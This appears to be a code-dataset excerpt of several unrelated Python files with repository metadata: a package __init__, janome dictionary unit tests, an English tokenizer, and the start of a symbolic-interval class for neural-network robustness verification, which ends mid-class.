| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
7903133b41fa1b97b42a57086a2ea357c2af4943
| 160
|
py
|
Python
|
civet/__init__.py
|
PMKielstra/Civet
|
1731a1b1e670a082dfcbf545f3431a79d7954411
|
[
"MIT"
] | 3
|
2020-06-27T21:33:53.000Z
|
2020-07-03T07:39:46.000Z
|
civet/__init__.py
|
PMKielstra/Civet
|
1731a1b1e670a082dfcbf545f3431a79d7954411
|
[
"MIT"
] | null | null | null |
civet/__init__.py
|
PMKielstra/Civet
|
1731a1b1e670a082dfcbf545f3431a79d7954411
|
[
"MIT"
] | null | null | null |
from .civet import Civet
from .building_blocks import *
from .builtin_scenario_sources import *
from .builtin_analyzers import *
from .builtin_outputs import *
| 26.666667
| 39
| 0.81875
| 21
| 160
| 6
| 0.47619
| 0.238095
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 160
| 5
| 40
| 32
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
791dfad53cd2a8af5d637308ac6edd7c1c6b6ee8
| 11,624
|
py
|
Python
|
tests/test_dic.py
|
narupo/janome
|
9304d45ce8e0ed7094284d478b318c02ccbe6408
|
[
"Apache-2.0"
] | 748
|
2015-02-14T12:13:59.000Z
|
2022-03-27T23:16:47.000Z
|
tests/test_dic.py
|
narupo/janome
|
9304d45ce8e0ed7094284d478b318c02ccbe6408
|
[
"Apache-2.0"
] | 87
|
2015-04-09T02:36:14.000Z
|
2022-03-23T06:15:29.000Z
|
tests/test_dic.py
|
narupo/janome
|
9304d45ce8e0ed7094284d478b318c02ccbe6408
|
[
"Apache-2.0"
] | 66
|
2015-04-11T04:42:28.000Z
|
2022-03-27T16:14:30.000Z
|
# Copyright 2015 moco_beta
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import unittest
from janome.sysdic import all_fstdata, entries, mmap_entries, connections, chardef, unknowns
from janome.dic import (
SystemDictionary,
MMapSystemDictionary,
UserDictionary,
CompiledUserDictionary,
FILE_USER_FST_DATA,
FILE_USER_ENTRIES_DATA
)
from janome.progress import SimpleProgressIndicator, logger as p_logger
# TODO: better way to find package...
parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, parent_dir)
class TestDictionary(unittest.TestCase):
    """Tests for janome's system, mmap, user, and compiled-user dictionaries."""

    def test_system_dictionary_ipadic(self):
        """Lookup counts, connection costs, char categories and unknown-word
        properties of the IPADIC-based system dictionary."""
        sys_dic = SystemDictionary(all_fstdata(), entries(), connections, chardef.DATA, unknowns.DATA)
        self.assertEqual(7, len(sys_dic.lookup('形態素'.encode('utf-8'))))
        self.assertEqual(1, sys_dic.get_trans_cost(0, 1))
        self.assertEqual({'HIRAGANA': []}, sys_dic.get_char_categories('は'))
        # Full-width and half-width variants of the same character class.
        self.assertEqual({'KATAKANA': []}, sys_dic.get_char_categories('ハ'))
        self.assertEqual({'KATAKANA': []}, sys_dic.get_char_categories('ハ'))
        self.assertEqual({'KANJI': []}, sys_dic.get_char_categories('葉'))
        self.assertEqual({'ALPHA': []}, sys_dic.get_char_categories('C'))
        self.assertEqual({'ALPHA': []}, sys_dic.get_char_categories('C'))
        self.assertEqual({'SYMBOL': []}, sys_dic.get_char_categories('#'))
        self.assertEqual({'SYMBOL': []}, sys_dic.get_char_categories('#'))
        self.assertEqual({'NUMERIC': []}, sys_dic.get_char_categories('5'))
        self.assertEqual({'NUMERIC': []}, sys_dic.get_char_categories('5'))
        # A kanji numeral belongs to both KANJI and KANJINUMERIC (compat KANJI).
        self.assertEqual({'KANJI': [], 'KANJINUMERIC': ['KANJI']}, sys_dic.get_char_categories('五'))
        self.assertEqual({'GREEK': []}, sys_dic.get_char_categories('Γ'))
        self.assertEqual({'CYRILLIC': []}, sys_dic.get_char_categories('Б'))
        # Characters outside every defined range fall into DEFAULT.
        self.assertEqual({'DEFAULT': []}, sys_dic.get_char_categories('𠮷'))
        self.assertEqual({'DEFAULT': []}, sys_dic.get_char_categories('한'))
        self.assertTrue(sys_dic.unknown_invoked_always('ALPHA'))
        self.assertFalse(sys_dic.unknown_invoked_always('KANJI'))
        self.assertTrue(sys_dic.unknown_grouping('NUMERIC'))
        self.assertFalse(sys_dic.unknown_grouping('KANJI'))
        self.assertEqual(2, sys_dic.unknown_length('HIRAGANA'))

    def test_property_types(self):
        """Entry tuples must carry the expected element types (int vs str)
        across system, mmap, and user dictionaries."""
        sys_dic = SystemDictionary(all_fstdata(), entries(), connections, chardef.DATA, unknowns.DATA)
        # entry in the system dictionary
        entry = sys_dic.lookup('すもも'.encode('utf8'))[0]
        self.assertTrue(type(entry[1]) is str)
        self.assertTrue(type(entry[0]) is int)
        self.assertTrue(type(entry[2]) is int)
        self.assertTrue(type(entry[3]) is int)
        self.assertTrue(type(entry[4]) is int)
        entry_extra = sys_dic.lookup_extra(entry[0])
        self.assertTrue(type(entry_extra[0]) is str)
        self.assertTrue(type(entry_extra[1]) is str)
        self.assertTrue(type(entry_extra[2]) is str)
        self.assertTrue(type(entry_extra[3]) is str)
        self.assertTrue(type(entry_extra[4]) is str)
        self.assertTrue(type(entry_extra[5]) is str)
        # unknown entry
        entry = sys_dic.unknowns.get(u'HIRAGANA')[0]
        self.assertTrue(type(entry[3]) is str)
        self.assertTrue(type(entry[0]) is int)
        self.assertTrue(type(entry[1]) is int)
        self.assertTrue(type(entry[2]) is int)
        # mmap dict entry
        mmap_dic = MMapSystemDictionary(all_fstdata(), mmap_entries(), connections, chardef.DATA, unknowns.DATA)
        entry = mmap_dic.lookup(u'すもも'.encode('utf8'))[0]
        self.assertTrue(type(entry[1]) is str)
        self.assertTrue(type(entry[0]) is int)
        self.assertTrue(type(entry[2]) is int)
        self.assertTrue(type(entry[3]) is int)
        self.assertTrue(type(entry[4]) is int)
        entry_extra = mmap_dic.lookup_extra(entry[0])
        self.assertTrue(type(entry_extra[0]) is str)
        self.assertTrue(type(entry_extra[1]) is str)
        self.assertTrue(type(entry_extra[2]) is str)
        self.assertTrue(type(entry_extra[3]) is str)
        self.assertTrue(type(entry_extra[4]) is str)
        self.assertTrue(type(entry_extra[5]) is str)
        # entry in the user defined dictionary
        user_dic = UserDictionary(user_dict=os.path.join(parent_dir, 'tests/user_ipadic.csv'),
                                  enc='utf8', type='ipadic', connections=connections)
        entry = user_dic.lookup('東京スカイツリー'.encode('utf8'))[0]
        self.assertTrue(type(entry[1]) is str)
        self.assertTrue(type(entry[0]) is int)
        self.assertTrue(type(entry[2]) is int)
        self.assertTrue(type(entry[3]) is int)
        self.assertTrue(type(entry[4]) is int)

    def test_system_dictionary_cache(self):
        """Repeated lookups return the same results (presumably served from
        the lookup cache on the second call — TODO confirm)."""
        sys_dic = SystemDictionary(all_fstdata(), entries(), connections, chardef.DATA, unknowns.DATA)
        self.assertEqual(11, len(sys_dic.lookup('小書き'.encode('utf8'))))
        self.assertEqual(11, len(sys_dic.lookup('小書き'.encode('utf8'))))
        self.assertEqual(11, len(sys_dic.lookup('小書きにしました'.encode('utf8'))))
        self.assertEqual(10, len(sys_dic.lookup('みんなと'.encode('utf8'))))
        self.assertEqual(10, len(sys_dic.lookup('みんなと'.encode('utf8'))))
        self.assertEqual(2, len(sys_dic.lookup('叩く'.encode('utf8'))))
        self.assertEqual(2, len(sys_dic.lookup('叩く'.encode('utf8'))))

    def test_user_dictionary(self):
        """Build an IPADIC-format user dictionary from CSV, save the compiled
        form, and look up entries through the compiled dictionary."""
        # create user dictionary from csv
        user_dic = UserDictionary(user_dict=os.path.join(parent_dir, 'tests/user_ipadic.csv'),
                                  enc='utf8', type='ipadic', connections=connections)
        self.assertEqual(1, len(user_dic.lookup('東京スカイツリー'.encode('utf8'))))
        # save compiled dictionary
        dic_dir = os.path.join(parent_dir, 'tests/userdic')
        user_dic.save(to_dir=os.path.join(parent_dir, 'tests/userdic'))
        self.assertTrue(os.path.exists(os.path.join(dic_dir, FILE_USER_FST_DATA)))
        self.assertTrue(os.path.exists(os.path.join(dic_dir, FILE_USER_ENTRIES_DATA)))
        # load compiled dictionary
        compiled_user_dic = CompiledUserDictionary(dic_dir, connections=connections)
        self.assertEqual(1, len(compiled_user_dic.lookup('とうきょうスカイツリー駅'.encode('utf8'))))

    def test_user_dictionary_with_progress(self):
        """Building a user dictionary with a progress handler logs one line per
        entry per phase (CSV read, then create_minimum_transducer), plus a
        completion line for each phase."""
        # create user dictionary from csv with progress indicator
        progress_indicator = SimpleProgressIndicator(update_frequency=1.0)
        with self.assertLogs(logger=p_logger) as cm:
            # create user dictionary
            large_user_dic = UserDictionary(
                user_dict=os.path.join(parent_dir, 'tests/user_ipadic.csv'),
                enc='utf8', type='ipadic', connections=connections,
                progress_handler=progress_indicator)
        entry_count = len(large_user_dic.entries)
        # output for each entry and for complete (entry_count + 1)
        self.assertEqual((entry_count + 1) * 2, len(cm.output))
        # reset after complete
        self.assertIsNone(progress_indicator.value)
        for i in range(0, (entry_count + 1) * 2):
            if i < entry_count:
                # progress for reading csv
                self.assertIn('Reading user dictionary from CSV', cm.output[i])
                self.assertIn(f'{i + 1}/{entry_count}', cm.output[i])
            elif i == entry_count:
                # on complete loading csv
                self.assertIn(f'{entry_count}/{entry_count}', cm.output[i])
            elif i < entry_count * 2 + 1:
                # progress for create_minimum_transducer
                self.assertIn('Running create_minimum_transducer', cm.output[i])
                self.assertIn(f'{i - entry_count}/{entry_count}', cm.output[i])
            elif i == entry_count * 2 + 1:
                # on complete loading create_minimum_transducer
                self.assertIn(f'{entry_count}/{entry_count}', cm.output[i])
        # same result as without progress indicator
        self.assertEqual(1, len(large_user_dic.lookup('東京スカイツリー'.encode('utf8'))))

    def test_simplified_user_dictionary(self):
        """Same round-trip as test_user_dictionary but with the simplified
        (simpledic) CSV format and a separate output directory."""
        # create user dictionary from csv
        user_dic = UserDictionary(user_dict=os.path.join(parent_dir, 'tests/user_simpledic.csv'),
                                  enc='utf8', type='simpledic', connections=connections)
        self.assertEqual(1, len(user_dic.lookup('東京スカイツリー'.encode('utf8'))))
        # save compiled dictionary
        dic_dir = os.path.join(parent_dir, 'tests/userdic_simple')
        user_dic.save(to_dir=os.path.join(parent_dir, 'tests/userdic_simple'))
        self.assertTrue(os.path.exists(os.path.join(dic_dir, FILE_USER_FST_DATA)))
        self.assertTrue(os.path.exists(os.path.join(dic_dir, FILE_USER_ENTRIES_DATA)))
        # load compiled dictionary
        compiled_user_dic = CompiledUserDictionary(dic_dir, connections=connections)
        self.assertEqual(1, len(compiled_user_dic.lookup('とうきょうスカイツリー駅'.encode('utf8'))))

    def test_simplified_user_dictionary_with_progress(self):
        """Progress logging for the simplified CSV format; mirrors
        test_user_dictionary_with_progress."""
        # create simplified user dictionary from csv with progress indicator
        progress_indicator = SimpleProgressIndicator(update_frequency=1.0)
        with self.assertLogs(logger=p_logger) as cm:
            # create user dictionary
            large_user_dic = UserDictionary(
                user_dict=os.path.join(parent_dir, 'tests/user_simpledic.csv'),
                enc='utf8', type='simpledic', connections=connections,
                progress_handler=progress_indicator)
        entry_count = len(large_user_dic.entries)
        # output for each entry and for complete (entry_count + 1)
        self.assertEqual((entry_count + 1) * 2, len(cm.output))
        # value is reset after complete
        self.assertIsNone(progress_indicator.value)
        for i in range(0, (entry_count + 1) * 2):
            if i < entry_count:
                # progress for reading csv
                self.assertIn('Reading user dictionary from CSV', cm.output[i])
                self.assertIn(f'{i + 1}/{entry_count}', cm.output[i])
            elif i == entry_count:
                # on complete loading csv
                self.assertIn(f'{entry_count}/{entry_count}', cm.output[i])
            elif i < entry_count * 2 + 1:
                # progress for create_minimum_transducer
                self.assertIn('Running create_minimum_transducer', cm.output[i])
                self.assertIn(f'{i - entry_count}/{entry_count}', cm.output[i])
            elif i == entry_count * 2 + 1:
                # on complete loading create_minimum_transducer
                self.assertIn(f'{entry_count}/{entry_count}', cm.output[i])
        # same result as without progress indicator
        self.assertEqual(1, len(large_user_dic.lookup('東京スカイツリー'.encode('utf8'))))
if __name__ == '__main__':
unittest.main()
| 50.759825
| 112
| 0.649088
| 1,475
| 11,624
| 4.932881
| 0.147797
| 0.071193
| 0.07669
| 0.097993
| 0.809373
| 0.776663
| 0.753848
| 0.741067
| 0.728697
| 0.722375
| 0
| 0.013202
| 0.224535
| 11,624
| 228
| 113
| 50.982456
| 0.793987
| 0.130936
| 0
| 0.573248
| 0
| 0
| 0.091262
| 0.031912
| 0
| 0
| 0
| 0.004386
| 0.56051
| 1
| 0.044586
| false
| 0
| 0.038217
| 0
| 0.089172
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e394cf8051ab02ec8d95d9b81d89e858337e83f4
| 102
|
py
|
Python
|
a24/test.py
|
assassinen/coursera_mfti_python
|
eee7b3c55256f391c1be32924fa1ad3364b307f2
|
[
"Apache-2.0"
] | null | null | null |
a24/test.py
|
assassinen/coursera_mfti_python
|
eee7b3c55256f391c1be32924fa1ad3364b307f2
|
[
"Apache-2.0"
] | null | null | null |
a24/test.py
|
assassinen/coursera_mfti_python
|
eee7b3c55256f391c1be32924fa1ad3364b307f2
|
[
"Apache-2.0"
] | null | null | null |
'https://git.8gen.team/exchange/backoffice/b0-db_generator/blob/BO-188/db_generator/data/test_1.jsonl'
| 102
| 102
| 0.823529
| 18
| 102
| 4.5
| 0.888889
| 0.271605
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 102
| 1
| 102
| 102
| 0.735294
| 0.980392
| 0
| 0
| 0
| 1
| 0.970874
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e3ac2abc9f37c57687d9e61cf167f9c0f7957c0b
| 5,897
|
py
|
Python
|
src/renet2/utils/tokenizer.py
|
sujunhao/RENET2
|
21fb57d17544556e5f62737a6df40ff5e5f990ba
|
[
"BSD-3-Clause"
] | 16
|
2021-03-06T10:41:00.000Z
|
2022-03-29T02:16:04.000Z
|
src/renet2/utils/tokenizer.py
|
sujunhao/RENET2
|
21fb57d17544556e5f62737a6df40ff5e5f990ba
|
[
"BSD-3-Clause"
] | 2
|
2021-06-16T10:19:47.000Z
|
2021-07-16T08:12:18.000Z
|
src/renet2/utils/tokenizer.py
|
sujunhao/RENET2
|
21fb57d17544556e5f62737a6df40ff5e5f990ba
|
[
"BSD-3-Clause"
] | 1
|
2022-03-22T02:13:19.000Z
|
2022-03-22T02:13:19.000Z
|
def replace(s, s1, s2, skip):
    """Replace every occurrence of *s1* in *s* with *s2*, except matches
    immediately preceded by the character *skip*.

    Scanning resumes after each replacement (or just past a skipped
    match), so replacements never overlap and freshly inserted text is
    not rescanned.

    Args:
        s: string to operate on.
        s1: substring to search for.
        s2: replacement text.
        skip: single character; a match preceded by it is left untouched.

    Returns:
        The resulting string.
    """
    pos = 0
    while True:
        i = s.find(s1, pos)
        if i == -1:
            break
        if i > 0 and s[i - 1] == skip:
            # Preceded by the skip character: leave this match alone.
            pos = i + 1
            continue
        s = s[:i] + s2 + s[i + len(s1):]
        pos = i + len(s2)
    return s
#only add space and split
def tokenize(s):
    """Tokenize sentence *s* in Penn-Treebank style and return the tokens.

    Splits off punctuation and brackets, separates the sentence-final
    period, isolates quotes, and splits English contractions ('s, n't,
    gonna, wanna, ...). The replacement order matters: quote handling
    runs before generic punctuation, and the sentence-final period is
    located before '?'/'!' splitting.

    Args:
        s: non-empty sentence string.

    Returns:
        List of token strings.
    """
    # Isolate double quotes at the start or after space/opening brackets.
    if s[0] == '"':
        s = "\" " + s[1:]
    s = s.replace(" \"", " \" ")
    s = s.replace("(\"", "( \" ")
    s = s.replace("[\"", "[ \" ")
    s = s.replace("{\"", "{ \" ")
    s = s.replace("<\"", "< \" ")
    # Ellipsis and common punctuation.
    s = s.replace("...", " ... ")
    s = s.replace(",", " , ")
    s = s.replace(";", " ; ")
    s = s.replace(":", " : ")
    s = s.replace("@", " @ ")
    s = s.replace("#", " # ")
    s = s.replace("$", " $ ")
    s = s.replace("%", " % ")
    s = s.replace("&", " & ")
    # Locate the sentence-final period: skip trailing spaces and closing
    # brackets/quotes, then split a lone '.' (but not an ellipsis).
    pos = len(s) - 1
    while pos > 0 and s[pos] == ' ':
        pos = pos - 1
    while pos > 0:
        c = s[pos]
        if (c == '[' or c == ']' or c == ')' or c == '}' or c == '>' or
                c == '"' or c == '\''):
            pos -= 1
            continue
        break
    if pos >= 0 and s[pos] == '.' and not (pos > 0 and s[pos-1] == '.'):
        s = s[:pos] + " ." + s[pos+1:]
    # Remaining punctuation and brackets.
    s = s.replace("?", " ? ")
    s = s.replace("!", " ! ")
    s = s.replace("[", " [ ")
    s = s.replace("]", " ] ")
    s = s.replace("(", " ( ")
    s = s.replace(")", " ) ")
    s = s.replace("{", " { ")
    s = s.replace("}", " } ")
    s = s.replace("<", " < ")
    s = s.replace(">", " > ")
    s = s.replace("--", " -- ")
    # Pad the ends so the space-anchored patterns below match at boundaries.
    s = " " + s
    s = s + " "
    s = s.replace("\"", " \" ")
    # Split a trailing apostrophe unless it is preceded by another one.
    s = replace(s, "' ", " ' ", '\'')
    s = s.replace("'s ", " 's ")
    s = s.replace("'S ", " 'S ")
    s = s.replace("'m ", " 'm ")
    s = s.replace("'M ", " 'M ")
    s = s.replace("'d ", " 'd ")
    s = s.replace("'D ", " 'D ")
    s = s.replace("'ll ", " 'll ")
    s = s.replace("'re ", " 're ")
    s = s.replace("'ve ", " 've ")
    s = s.replace("n't ", " n't ")
    s = s.replace("'LL ", " 'LL ")
    s = s.replace("'RE ", " 'RE ")
    s = s.replace("'VE ", " 'VE ")
    s = s.replace("N'T ", " N'T ")
    s = s.replace(" Cannot ", " Can not ")
    s = s.replace(" cannot ", " can not ")
    s = s.replace(" D'ye ", " D' ye ")
    s = s.replace(" d'ye ", " d' ye ")
    s = s.replace(" Gimme ", " Gim me ")
    s = s.replace(" gimme ", " gim me ")
    s = s.replace(" Gonna ", " Gon na ")
    s = s.replace(" gonna ", " gon na ")
    s = s.replace(" Gotta ", " Got ta ")
    s = s.replace(" gotta ", " got ta ")
    s = s.replace(" Lemme ", " Lem me ")
    s = s.replace(" lemme ", " lem me ")
    s = s.replace(" More'n ", " More 'n ")
    s = s.replace(" more'n ", " more 'n ")
    s = s.replace("'Tis ", " 'T is ")
    s = s.replace("'tis ", " 't is ")
    s = s.replace("'Twas ", " 'T was ")
    s = s.replace("'twas ", " 't was ")
    s = s.replace(" Wanna ", " Wan na ")
    # BUG FIX: the original replaced " wanna " with itself (a no-op);
    # per the Treebank contraction rules (and the " Wanna " line above)
    # it must split into " wan na ".
    s = s.replace(" wanna ", " wan na ")
    lt = s.strip().split()
    return lt
def tokenize_s(s):
    """Tokenize a raw sentence string into a list of token strings.

    Splits punctuation, brackets, quotes and symbols into separate
    tokens, detaches a sentence-final period (while leaving a final
    ellipsis alone), and splits the "cannot" / "d'ye" contractions.
    Because every remaining apostrophe, hyphen, slash, etc. is split in
    a final pass, contractions such as "can't" end up fully separated
    (e.g. ["ca", "n", "'", "t"]), matching the original behavior.

    Args:
        s: the sentence to tokenize.

    Returns:
        A list of tokens; an empty list for empty input (the original
        raised IndexError on "" — fixed here).
    """
    if not s:
        # Guard: indexing s[0] below would raise on an empty string.
        return []
    # Make a leading double quote its own token.
    if s[0] == '"':
        s = '" ' + s[1:]
    # Phase 1: detach quotes that follow whitespace/open brackets, the
    # ellipsis, and common mid-sentence punctuation.  Order matters:
    # later passes must not re-split what these insert.
    for old, new in (
        (" \"", " \" "),
        ("(\"", "( \" "),
        ("[\"", "[ \" "),
        ("{\"", "{ \" "),
        ("<\"", "< \" "),
        ("...", " ... "),
        (",", " , "),
        (";", " ; "),
        (":", " : "),
        ("@", " @ "),
        ("#", " # "),
        ("$", " $ "),
        ("%", " % "),
        ("&", " & "),
    ):
        s = s.replace(old, new)
    # Phase 2: detach a sentence-final period.  Scan backwards over
    # trailing spaces, then over closing brackets/quotes; if the
    # character found is a single '.' (not part of a ".." run), split
    # it off as its own token.
    pos = len(s) - 1
    while pos > 0 and s[pos] == ' ':
        pos -= 1
    while pos > 0 and s[pos] in '[])}>"\'':
        pos -= 1
    if pos >= 0 and s[pos] == '.' and not (pos > 0 and s[pos - 1] == '.'):
        s = s[:pos] + " ." + s[pos + 1:]
    # Phase 3: split the remaining brackets and terminal punctuation.
    for old, new in (
        ("?", " ? "),
        ("!", " ! "),
        ("[", " [ "),
        ("]", " ] "),
        ("(", " ( "),
        (")", " ) "),
        ("{", " { "),
        ("}", " } "),
        ("<", " < "),
        (">", " > "),
        ("--", " -- "),
    ):
        s = s.replace(old, new)
    # Pad so the word-boundary patterns below also match at the ends.
    s = " " + s + " "
    # Phase 4: contraction splits, then a blanket split of apostrophes
    # and remaining symbols.  The blanket "'" split runs after (and
    # further divides) the contraction splits, as in the original.
    # The original's trailing duplicate ";" replace was redundant (no
    # ';' can be reintroduced after phase 1) and is dropped.
    for old, new in (
        ("\"", " \" "),
        ("' ", " ' "),
        ("'s ", " 's "),
        ("'S ", " 'S "),
        ("'m ", " 'm "),
        ("'M ", " 'M "),
        ("'d ", " 'd "),
        ("'D ", " 'D "),
        ("'ll ", " 'll "),
        ("'re ", " 're "),
        ("'ve ", " 've "),
        ("n't ", " n't "),
        ("'LL ", " 'LL "),
        ("'RE ", " 'RE "),
        ("'VE ", " 'VE "),
        ("N'T ", " N'T "),
        (" Cannot ", " Can not "),
        (" cannot ", " can not "),
        (" D'ye ", " D' ye "),
        (" d'ye ", " d' ye "),
        ("-", " - "),
        ("'", " ' "),
        ("/", " / "),
        ("_", " _ "),
        ("*", " * "),
        ("+", " + "),
        ("=", " = "),
        (".", " . "),
    ):
        s = s.replace(old, new)
    return s.strip().split()
| 26.09292
| 72
| 0.370527
| 819
| 5,897
| 2.664225
| 0.069597
| 0.147571
| 0.560953
| 0.311641
| 0.907883
| 0.907883
| 0.907883
| 0.907883
| 0.907883
| 0.907883
| 0
| 0.008744
| 0.301848
| 5,897
| 225
| 73
| 26.208889
| 0.521253
| 0.14465
| 0
| 0.772455
| 0
| 0.011976
| 0.178265
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017964
| false
| 0
| 0
| 0
| 0.035928
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e3fd3ed47ad8b8905f736c911abe74102883803a
| 25,448
|
py
|
Python
|
pytorch_ares/third_party/hydra/symbolic_interval/interval.py
|
thu-ml/realsafe
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 107
|
2020-06-15T09:55:11.000Z
|
2020-12-20T11:27:11.000Z
|
pytorch_ares/third_party/hydra/symbolic_interval/interval.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 7
|
2020-06-14T03:00:18.000Z
|
2020-12-07T07:10:10.000Z
|
pytorch_ares/third_party/hydra/symbolic_interval/interval.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 19
|
2020-06-14T08:35:33.000Z
|
2020-12-19T13:43:41.000Z
|
'''
Interval class definitions
** Top contributor: Shiqi Wang
** This file is part of the symbolic interval analysis library.
** Copyright (c) 2018-2019 by the authors listed in the file LICENSE
** and their institutional affiliations.
** All rights reserved.
'''
from __future__ import print_function
import numpy as np
import torch
import warnings
class Interval():
    '''Naive interval for bound propagation through a network.

    Naive interval propagation is cheap (roughly two regular forward
    passes) but loose, because dependencies between inputs are ignored;
    see ReluVal (https://arxiv.org/abs/1804.10829) for the tradeoff.
    It underlies training schemes such as
    DiffAI (http://proceedings.mlr.press/v80/mirman18b/mirman18b.pdf)
    and IBP (https://arxiv.org/pdf/1810.12715.pdf), which are fast but
    whose trained robustness suffers from the loose estimation.

    Attributes:
        l, u: lower/upper bound tensors (same shape as the layer input;
            no upper value may be below its lower value).
        c, e: center point and radius of the interval; symbolic
            propagation works on these to keep dependencies.
        mask: per-ReLU estimation info.  For each hidden node with
            pre-ReLU range [l, u] it stores the slope u/(u-l): 0 means
            the input is always negative (output always 0), 1 means it
            always stays positive, anything in between marks a relaxed
            node that introduces overestimation error.
    '''

    def __init__(self, lower, upper, use_cuda=False):
        # Inverse intervals may carry inverted bounds, so the sanity
        # check is skipped for them.
        if not isinstance(self, Inverse_interval):
            assert not ((upper - lower) < 0).any(), "upper less than lower"
        self.update_lu(lower, upper)
        self.mask = []
        self.use_cuda = use_cuda

    def update_lu(self, lower, upper):
        '''Refresh the interval from new lower/upper bound tensors.'''
        self.l = lower
        self.u = upper
        self.c = (lower + upper) / 2
        self.e = (upper - lower) / 2

    def update_ce(self, center, error):
        '''Refresh the interval from a new center/radius pair.'''
        self.c = center
        self.e = error
        self.u = center + error
        self.l = center - error

    def __str__(self):
        '''Human-readable dump of the interval shape and bounds.'''
        parts = [
            "interval shape:" + str(self.c.shape),
            "\nlower:" + str(self.l),
            "\nupper:" + str(self.u),
        ]
        return "".join(parts)

    def worst_case(self, y, output_size):
        '''Return upper bounds of every label relative to target `y`.

        For each sample, subtracts the lower bound of the target label
        from every upper bound and zeroes the target entry (mutating
        ``self.u`` in place).  A result below 0 means the worst case
        can never exceed the target label's output.
        '''
        assert y.shape[0] == self.l.shape[0] == self.u.shape[0],\
                "wrong input shape"
        for i in range(y.shape[0]):
            target_low = self.l[i, y[i]]
            self.u[i] = self.u[i] - target_low
            self.u[i, y[i]] = 0.0
        return self.u
class Inverse_interval(Interval):
    '''Interval propagated in reverse.

    Bounds may be inverted (the base-class sanity check is skipped for
    this type), and the worst case is the elementwise norm |c| + |e|.
    '''

    def __init__(self, lower, upper, use_cuda=False):
        assert lower.shape[0] == upper.shape[0], (
            "each symbolic" "should have the same shape")
        super().__init__(lower, upper)
        self.use_cuda = use_cuda
        # Flattened bookkeeping of the per-sample layout.
        self.shape = list(self.c.shape[1:])
        self.n = list(self.c[0].reshape(-1).size())[0]
        self.input_size = self.n
        self.batch_size = self.c.shape[0]

    def worst_case(self, y, output_size):
        '''Taking the norm of the inverse interval for the worst case.'''
        assert y.shape[0] == self.l.shape[0] == self.u.shape[0],\
                "wrong input shape"
        return self.c.abs() + self.e.abs()
class Symbolic_interval(Interval):
    '''Symbolic interval class.

    Symbolic interval analysis is a state-of-the-art tight output range
    analysis method.  It captures the dependencies ignored by naive
    interval propagation; as the tradeoff, the cost is much higher than
    naive interval and regular propagations.  To maximize tightness,
    symbolic linear relaxation is used.  More details can be found in
    Neurify: https://arxiv.org/pdf/1809.08098.pdf

    Similar methods providing close tightness:
    (1) Convex polytope: https://arxiv.org/abs/1711.00851
    (2) FastLin: https://arxiv.org/abs/1804.09699
    (3) DeepZ: https://files.sri.inf.ethz.ch/website/papers/DeepZ.pdf

    Symbolic interval analysis is used to verifiably robustly train
    networks in MixTrain (https://arxiv.org/abs/1811.02625).  Similar
    training methods include the scaling defense
    (https://arxiv.org/abs/1805.12514) and DiffAI
    (http://proceedings.mlr.press/v80/mirman18b/mirman18b.pdf).

    * :attr:`shape` is the input shape of ReLU layers.
    * :attr:`n` is the number of hidden nodes in each layer.
    * :attr:`idep` keeps the input dependencies.
    * :attr:`edep` keeps the error dependency introduced by each
      overestimated node.
    '''
    def __init__(self, lower, upper, epsilon=0, norm="linf", use_cuda=False):
        # Bounds must agree on the batch dimension.
        assert lower.shape[0]==upper.shape[0], "each symbolic"+\
            "should have the same shape"
        Interval.__init__(self, lower, upper)
        self.use_cuda = use_cuda
        self.shape = list(self.c.shape[1:])  # per-sample tensor shape
        # Number of scalar nodes per sample (flattened size).
        self.n = list(self.c[0].reshape(-1).size())[0]
        self.input_size = self.n
        self.batch_size = self.c.shape[0]
        self.epsilon = epsilon
        self.norm = norm
        # Input-dependency matrix starts as the identity: every input
        # node depends only on itself.  Shape (1, n, n).
        if(self.use_cuda):
            self.idep = torch.eye(self.n, device=self.c.get_device()).unsqueeze(0)
        else:
            self.idep = torch.eye(self.n).unsqueeze(0)
